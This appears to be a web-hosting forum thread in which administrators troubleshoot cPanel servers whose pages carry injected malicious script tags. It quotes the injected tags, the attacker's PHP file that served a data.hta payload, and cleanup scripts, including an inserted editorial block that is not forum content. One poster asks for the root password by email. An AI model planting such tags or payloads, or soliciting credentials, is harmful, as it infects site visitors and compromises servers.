The Community Forums


Virus TROJAN.DROPPER, need help!

Discussion in 'General Discussion' started by elenlace, Aug 25, 2004.

  1. elenlace

    elenlace Well-Known Member

    Joined:
    Sep 10, 2002
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    Hello,

    We have CPanel and the whole server has been infected with a virus called BLOODHOUND.EXPLOIT and/or TROJAN.DROPPER, VBS/INOR, etc. I have CPanel's open_basedir security enabled so I have no idea how it has been spread to all the sites.

    The code that is "inserted" into webpages varies, but it is usually:

    <script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>

    We need help as well, we are willing to pay an expert to clean our server and give us the "recipe" to solve similar issues in the future.

    Regards,

    elenlace

    PS: We have already restored the server and bringing the sites from backups restarted the virus spread.
     
  2. WebKingPin

    WebKingPin Member

    Joined:
    Dec 5, 2003
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Not sure those are your problem

    Hi,

    I have researched both of the viruses you claim have infected your system.
    I take it you are running a UNIX box, correct?
    If so, both variants do not affect UNIX.
    http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

    Are you running osCommerce on any of your sites? If so you may want to check the directories. We noticed a security hole in the latest release which allows someone to add
    files to the cart system. I am not sure exactly how they did this but I removed 2 zip files containing trojans deeply nested within folders with random names in the osCommerce dir.

    Hope this helps,

    WKP
     
  3. WebKingPin

    WebKingPin Member

    Joined:
    Dec 5, 2003
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    aww yes

    Thinking....

    After further review of the Symantec site, I would say that it is definitely something on your local machine. The virus is defined as an Internet Explorer vulnerability. Sounds to me you need to update from the MS website and run a virus scan on your PC.

    I could be wrong but this is what I think your problem is.


    later,
    WKP
     
  5. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    This script will fix it:
    #!/bin/sh
    # Find every file under /home that carries the injected tag and strip that tag out
    cd /home
    files=`grep -r deckewwwr2 * -l | grep -v convert`
    for ii in $files; do
    echo "Processing $ii"
    cp -p "$ii" "$ii.bak"
    sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>||g' "$ii.bak" > "$ii"
    rm "$ii.bak"
    done

    What kernel are you using? (uname -r)
     
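A more careful version of the cleanup approach in this post, added here as an example and not code from any of the posters: it matches the injected tag by the marker string in its src attribute instead of the full literal URL, quotes every path so sites with spaces in their names are handled, and only drops the backup once the rewrite succeeded. The marker and tag come from this thread; the directory layout written by write_sample is constructed test data.

```shell
#!/bin/sh
# Added example, not the forum poster's script: locate web files carrying an
# injected <script> tag and strip only that tag, keeping the rest of the page.
# Marker and tag are from the thread; write_sample builds constructed test data.

# Strip every <script ...></script> element whose src contains $1 from file $2.
# sed works one line at a time, so a tag split across lines is left for review.
strip_injected_tag() {
    marker="$1"; f="$2"
    expr="s|<script[^>]*src=[\"'][^\"']*${marker}[^\"']*[\"'][^>]*></script>||g"
    cp -p "$f" "$f.bak" || return 1
    # drop the backup only when the rewrite succeeded, else restore the original
    if sed -e "$expr" "$f.bak" > "$f"; then
        rm -f "$f.bak"
    else
        mv -f "$f.bak" "$f"; return 1
    fi
}

# Number of regular files under directory $1 that still contain marker $2.
count_infected() {
    find "$1" -type f -exec grep -l -- "$2" {} \; | wc -l | tr -d ' '
}

# Clean every file under $1 that contains marker $2; quoting handles spaces in paths.
clean_tree() {
    find "$1" -type f -exec grep -l -- "$2" {} \; | while IFS= read -r f; do
        echo "Cleaning $f"
        strip_injected_tag "$2" "$f"
    done
}

# Constructed sample: two infected pages, one of them in a path containing a space.
write_sample() {
    tag='<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>'
    mkdir -p "$1/site one" "$1/site2/public_html"
    printf '<html><body><h1>Welcome</h1>%s</body></html>\n' "$tag" > "$1/site one/index.html"
    printf '<p>contact</p>\n%s\n' "$tag" > "$1/site2/public_html/contact.htm"
}
```

Run it against a copy of the document roots first and compare count_infected before and after; anything still counted after a pass is a tag that did not fit the one-line pattern and needs a manual look.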
  6. elenlace

    elenlace Well-Known Member

    Joined:
    Sep 10, 2002
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    Hi Abe,

    I'm using 2.4.21-15.0.4.ELsmp.

    I do have an idea how this happened. A local user (someone that purchased an account, later found to be a malicious user) put 3 files on his hosting.

    data.hta
    spl.php
    index.htm

    spl.php was a php script "compiling" the information on the data.hta.

    From there, it spread like a disease. Every account is getting it, and I can't find anything wrong with the server. Of course, it has been days since the malicious user account was cancelled and he has no access to the server. I have limited SSH to only my IP and ran rkhunter to check for rootkits. I have even run the evaluation version of McAfee for Linux and it found nothing wrong either. It only initially detected the virus as VBS/Inor on the backup of the malicious user account.

    I have even restored the server last sunday night, brought the sites up using the Cpanel backup, and the virus showed up AGAIN.

    It calls several websites, mainly asbestos-ccl.com. I can put the complete list if it helps.

    The viruses it tries to spread are a variety of Bloodhound, Generic Trojan, Javascript virus, etc.

    It is important to mention we are very security-aware:

    TMP noexec nosuid
    APF firewall blocking most ports INGRESS EGRESS
    MailScanner+CLAMAV for exim (I'm aware this probably has nothing to do with this exploit)
    RKHunter ran daily (0 rootkits so far)
    SSH limited to our ISP's IP Block
    No SSH for customers (of course blocked by the previous statement)
    Always latest, secure kernel
    Latest stable version of CPanel
    Latest version of Apache
    PHP 4.3.8

    WHAT ELSE DO WE NEED?

    I hope this thread helps anyone having this very annoying problem in the future. We will find a solution and once I find it I will post it here.

    Regards,

    elenlace
     
  7. elenlace

    elenlace Well-Known Member

    Joined:
    Sep 10, 2002
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    Further information on this issue:

    The PHP file contained:

    <?
    header("content-type: application/hta");
    $szFile="data.hta";
    $hFile=fopen($szFile, "r");
    $szHTML=fread($hFile,filesize($szFile));
    fclose($hFile);
    echo($szHTML);
    ?>

    The .hta was a bunch of code, probably binary content "compiled" by the previous code.
     
  8. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Upgrade your kernel ASAP!


    Did this script work?
    #!/bin/sh
    # Find every file under /home that carries the injected tag and strip that tag out
    cd /home
    files=`grep -r deckewwwr2 * -l | grep -v convert`
    for ii in $files; do
    echo "Processing $ii"
    cp -p "$ii" "$ii.bak"
    sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>||g' "$ii.bak" > "$ii"
    rm "$ii.bak"
    done
     
  9. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Create file called
    fixpages
    put my script in fixpages
    chmod 700 fixpages
    ./fixpages
     
  10. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    EMail me your root password if you want me to take a look

    Do you have physical access to this server?
     
  11. tinboye22

    tinboye22 Active Member

    Joined:
    Sep 16, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Bloodhound Exploit 54 - NEW!!

    My server was infected by this virus through a backdoor in a file that was installed by cpanel.
    Once I found out about it, my IT people were quick to rectify it, but I wanted to share this with others that may have this issue.

    The enable_dl function in PHP is to blame; all you need to do is turn it off and remove the trojans, then your server will function fine. Be aware some scripts require this file to function. But as soon as you enable it your server will be exploited again.

    thanks

    Justin
     
  12. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Just to clarify - your server would not have been infected by this. The server would have been compromised through a vulnerable php script and then that dynamic module installed. It is that module which redirects sites that infects Windows PCs with that virus. So, this is a server compromise due to insecure scripts, not a virus infection, which implies something different:

    http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.54.html

    Either way, disabling enable_dl is always a good idea.
     
  13. hostit1

    hostit1 Well-Known Member

    Joined:
    Jul 24, 2003
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    How do you find root cause

    Hello,

    We have a terrible trojan that gets loaded into memory. How do we find out where the trojan is spawning its exploit into memory?

    What should I look for? I believe it is somewhere in the home directory.

    Any ideas?

    Kernel of the infected machine(s) 2.6.9-11.ELsmp & 2.6.9-22.0.1.ELsmp
    I have updated the kernel today to 2.6.9-34.0.1.ELsmp on both machines as well as performed a /scripts/upcp

    Should that fix the problem? I would love to find out where this trojan is "hiding" at so I can clean it up.

    We have mod_security and mod_evasive installed as well as apf

    Also, I ran the latest version of rkhunter and chkrootkit and they both found nothing.

    Tim Rice
    Host It Now Networks
     
    #13 hostit1, Jun 25, 2006
    Last edited: Jun 25, 2006
  14. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Well, you've posted to an old thread which probably is irrelevant to your problem, which is always the danger when digging them up like this rather than simply starting a new thread, which would be more appropriate.

    You need to explain more about why you think you have a trojan in memory and how it is manifesting. There are very very few real trojans or viruses for linux. The most likely exploit these days that loads into memory is if you have allowed dynamic libraries in php.ini, in which case you should disable it:

    enable_dl = Off

    Then restart httpd.
     
  15. hostit1

    hostit1 Well-Known Member

    Joined:
    Jul 24, 2003
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    Sorry John if I posted in the wrong area. It seems like the post was very similar to the behavior that I am seeing.

    I do have enable_dl turned off in the php.ini. I see very little usefulness in enabling this.
    Many clients complain that there will be code added to their pages such as a javascript source for a non-existent file.

    Others state that their anti-virus software detects a trojan when visiting certain sites.

    I have moved some of the larger clients who have complained about this to their own dedicated cpanel server.
    If I restart the server, things are great for a while, then the complaints start coming back in.


    BTW, we enjoyed the cpanel training in Houston.

    Tim
     
  16. kashif

    kashif Active Member

    Joined:
    Jul 11, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Lahore
    Javascript for trojan auto inserted in all websites

    Hi Chirpy,

    Sorry if I have not posted this in correct thread. Actually I have very serious issue that all my websites of server are getting the javascript code for trojan automatically inserted in pages. e.g.

    <script language='JavaScript' type='text/javascript' src='ghfdl.js'></script>

    And then I will get a message on a Windows PC with NOD32 of a trojan being downloaded from that server. I have tried to find from where it is loading but couldn't. Can you kindly tell me how I can find from where it is loading on all websites? And also one more issue: I can't create directories or files with names only having numerics, e.g. mkdir 123456 will give me this error:

    mkdir: cannot create directory `123456': No such file or directory

    even though that directory doesn't exist on the whole server. Can you kindly provide any guidelines in this regard? Especially that trojan javascript issue. I have already disabled enable_dl in php.ini.

    Thank you,

    Best Regards,
     
  17. kashif

    kashif Active Member

    Joined:
    Jul 11, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Lahore
    Can anyone help me in this regard? How can I disable that javascript being added in every website? Even no rootkit was found on the server...
     
  18. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    This is one of the most recent Linux exploits. Try the following: run ClamAV and F-Prot. Also, run chkrootkit and rkhunter. If none of these helped, you can seek help from your host, or seek professional help. Good luck!
     
  19. kashif

    kashif Active Member

    Joined:
    Jul 11, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Lahore
    Hi Andy,
    But how can I detect from where that javascript is being added in all websites... Do tell me so that I can fix this asap....

    Thanks....
     
    #19 kashif, Dec 30, 2007
    Last edited: Dec 30, 2007
  20. danbriant

    danbriant Registered

    Joined:
    Jan 9, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    I am having the exact same issue as well, except my js call is like this:
    <script language='JavaScript' type='text/javascript' src='avabf.js'></script>
    I ran rkhunter and found nothing, about to run a clamav scan.
     